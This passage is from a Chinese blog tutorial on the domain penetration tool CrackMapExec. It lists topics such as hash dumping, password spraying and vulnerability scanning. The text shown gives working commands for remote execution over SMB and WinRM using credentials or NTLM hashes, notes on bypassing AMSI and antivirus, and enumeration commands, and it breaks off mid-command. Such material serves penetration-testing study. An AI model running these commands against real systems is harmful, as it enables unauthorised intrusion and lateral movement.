CrackMapExec 域渗透工具使用(超级详细)

CrackMapExec实战指南

目录

一、CrackMapExec 是什么?

二、简单使用

1、获取帮助信息

2、smb连接执行命令

3、使用winrm执行命令(躲避杀软)

4、smb 协议常用枚举功能:

5、获取凭证 dump hash

6、导出域ntds6、导出域ntds

7、密码喷晒

8、文件上传、下载

9、检测主机上是否运行spooler、 webdav 服务

10、枚举域用户

11、ASREPRoast

12、查找非约束委派账户

13、检测ESC8(adcs)漏洞利用

14、通过活动目录收集子网段信息

15、查看具有DCsync权限用户

16、收集bloodhound 信息

17、通过RDP协议屏幕截图

18、扫描zerologo、petitpotam、nopac漏洞


最近接触到了这款CrackMapExec 域渗透工具,目前使用感觉是挺不错了,在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。文章摘自我的恩师:隐形卟

一、CrackMapExec 是什么?

CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。

二、简单使用


1、获取帮助信息

CrackMapExec  -h 获取帮助信息

可以看到支持使用哪些协议

通过使用指定的协议可以获取进一步的帮助信息

CrackMapExec smb -h

2、smb连接执行命令

-x 通过cmd.exe 执行命令
-X 通过cmd.exe 调用执行powershell命令
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
或者使用ntlm hash
crackmapexec smb 192.168.216.144 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356' -x 'whoami'
默认情况下会自动选择登录域,-d可以指定域登录,-x 要执行的命令
CME将按以下顺序执行命令
1.wmiexec:通过WMI执行命令
2.atexe:通过Windows任务调度程序调度任务来执行命令
3.smbexec:通过创建和运行服务来执行命令

-X '$PSVersionTable' 使用查看powershell 版本环境命令 ,--amsi-bypass /path/payload 执行powershell

3、使用winrm执行命令(躲避杀软)

身份验证成功时将显示(Pwn3d!)

通过winrm执行命令很多情况下可以绕过一些杀软的拦截

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'

4、smb 协议常用枚举功能:

crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups  枚举域组

crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt   枚举不需要smb签名的主机

crackmapexec smb <ip> -u user -p pass -M enum_av   枚举主机上的杀软

crackmapexec sm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值